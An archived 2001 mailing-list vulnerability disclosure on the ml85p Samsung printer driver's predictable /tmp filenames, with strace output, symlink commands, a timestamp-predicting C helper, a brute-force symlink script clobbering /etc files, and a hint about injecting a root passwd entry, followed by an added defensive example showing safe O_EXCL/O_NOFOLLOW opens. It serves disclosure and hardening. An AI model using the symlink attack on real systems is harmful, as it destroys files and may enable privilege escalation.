ml85p - driver for Samsung ML-85G and /tmp

From: KF (dotslashat_private)
Date: Mon Jul 09 2001 - 21:07:20 PDT

    ml85p - driver for Samsung ML-85G GDI printers seems to use /tmp insecurely.
    It seems to use the time() function to determine the /tmp file's name.
    
    [root@linux exp]# strings /usr/bin/ml85p | grep tmp
    /tmp/ml85g%d
    
    [401070dd] iopl(0x3)                    = 0
    [400cf2bd] time(NULL)                   = 994462668
    [40100cbf] brk(0)                       = 0x8064544
    [40100cbf] brk(0x80646c4)               = 0x80646c4
    [40100cbf] brk(0x8065000)               = 0x8065000
    [400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
    
    TIME(2)             Linux Programmer's Manual             TIME(2)
    
    NAME
           time - get time in seconds
    
    SYNOPSIS
           #include <time.h>
    
           time_t time(time_t *t);
    
    DESCRIPTION
           time  returns  the  time since the Epoch (00:00:00 UTC, January 1, 1970),
           measured in seconds.
    
    [d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462666
    [d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462667
    [d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462668
    
    This is trivial... root must run the following command. 
    [root@linux exp]# /usr/bin/ml85p -s 
    
    -s simulate the printing  process,  but  write  the  compressed  output  to  a
           /tmp/ml85xxxxxxxx  file,  where  the  filename  suffix  is the current time in
           time_t units (seconds since 12/31/1970).
    
    as you can see this is the one that hits us... 
    [400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
    
    oh how nice truncation flag... 
    
    O_TRUNC
           If  the  file  already  exists  and is a regular file and the open mode
           allows writing (i.e., is O_RDWR or O_WRONLY) it will  be  truncated  to
           length  0.  
    
    [root@linux exp]# ls -al /tmp | grep ml  
    -rw-r--r--    1 root     root            0 Jul  6 19:37 ml85g994462665
    lrwxrwxrwx    1 d0tslash d0tslash        9 Jul  6 19:37 ml85g994462666 -> /etc/test
    lrwxrwxrwx    1 d0tslash d0tslash        9 Jul  6 19:37 ml85g994462667 -> /etc/test
    lrwxrwxrwx    1 d0tslash d0tslash        9 Jul  6 19:37 ml85g994462668 -> /etc/test
    -rw-r--r--    1 root     root            0 Jul  6 19:37 ml85g994462669
    -rw-r--r--    1 root     root            0 Jul  6 19:37 ml85g994462670
    
    [d0tslash@linux d0tslash]$ ls -al /etc/test
    -rw-r--r--    1 root     root            0 Jul  6 19:37 /etc/test
    
    I am not sure what other OS's pick for permissions by default...
    Mandrake seems to not allow user access by default... I don't know
    what group you need to have access to use this feature.
    
    [d0tslash@linux d0tslash]$ /usr/bin/ml85p
    bash: /usr/bin/ml85p: Permission denied
    
    [d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
    -rwsr-x---    1 root     sys         11676 Mar 30 11:43 /usr/bin/ml85p*
    
    for shits and giggles let's see what happens if it's got bad perms.
    [root@linux exp]# chmod 4755 /usr/bin/ml85p   
    
    in which case the results are as follows 
    
    [d0tslash@linux d0tslash]$ /usr/bin/ml85p -s (several times)
    -rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463605
    -rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463607
    -rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463608
    -rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463609
    
    [d0tslash@linux d0tslash]$ cat ml85p-exp.c   
    // ln -s /etc/oops /tmp/ml85g`./ml85p-exp`
     
    #include <time.h>
    #include <stdio.h>
    int main(int argc, char **argv)
    {
        /* print the time_t the driver will use 30 seconds from now */
        int x = time(NULL);
        x = x + 30;
        printf("%i\n", x);
        return 0;
    }
    
    [d0tslash@linux d0tslash]$ cat ml85p.sh
    #!/bin/bash
    # krfinisterreat_private
    echo "brute.sh <low> <hi>"
    L=$1
    H=$2
    while [ $L -lt $H ]
    do
            ln -s /etc/oops /tmp/ml85g`./ml85p-exp`
            let L=L+1
    done
    
    the following file is created. 
    -rw-r--r--    1 root     d0tslash        0 Jul  6 20:18 /etc/oops
    
    not sure what use this is short of clobbering files... since the output is sent to this file it may be possible to print 
    owned::0:0:root:/root:/bin/bash  to this driver and it may append it to the file in /tmp... I am not sure though... just an idea
    -KF
    
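Added example, not code from KF's post or from the ml85p driver: the open() call as the strace above shows it, beside a hardened version, with a constructed scratch-directory scenario showing that O_EXCL/O_NOFOLLOW refuses a planted symlink while the driver-style O_TRUNC open follows it. Function names, the scratch directory and the "victim" file are assumptions made for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* Driver-style open as seen in the strace above: predictable name, O_TRUNC and
 * no O_EXCL, so a symlink planted at that name is followed and its target truncated. */
int open_spool_unsafe(const char *path)
{
    return open(path, O_RDWR | O_CREAT | O_TRUNC, 0666);
}

/* Hardened open: O_EXCL fails with EEXIST if anything (a symlink included) already
 * sits at path, O_NOFOLLOW never follows a symlink, 0600 keeps the spool private.
 * mkstemp(3) gives the same guarantees plus an unpredictable name. */
int open_spool_safe(const char *path)
{
    return open(path, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario in a private scratch directory: a 6-byte "victim" file and a
 * symlink named like the driver's spool file pointing at it. Returns 1 when the
 * hardened open refuses the symlink (EEXIST) while the driver-style open follows it
 * and truncates the victim to 0 bytes; 0 otherwise. Everything is cleaned up. */
int demo_symlink_defence(void)
{
    char dir[] = "/tmp/ml85demoXXXXXX", victim[256], lnk[256];
    struct stat st;
    int fd, safe_refused, saved_errno, result = 0;
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/ml85g%ld", dir, (long)time(NULL));
    fd = open(victim, O_WRONLY | O_CREAT, 0600);
    if (fd >= 0) { (void)write(fd, "secret", 6); close(fd); }
    (void)symlink(victim, lnk);
    fd = open_spool_safe(lnk);                 /* hardened: must be refused */
    saved_errno = errno;
    if (fd >= 0) close(fd);
    safe_refused = (fd == -1 && saved_errno == EEXIST);
    fd = open_spool_unsafe(lnk);               /* driver-style: follows the link */
    if (fd >= 0) close(fd);
    if (safe_refused && fd >= 0 && stat(victim, &st) == 0 && st.st_size == 0)
        result = 1;                            /* victim was clobbered */
    unlink(lnk); unlink(victim); rmdir(dir);
    return result;
}
```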
    This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 09:45:27 PDT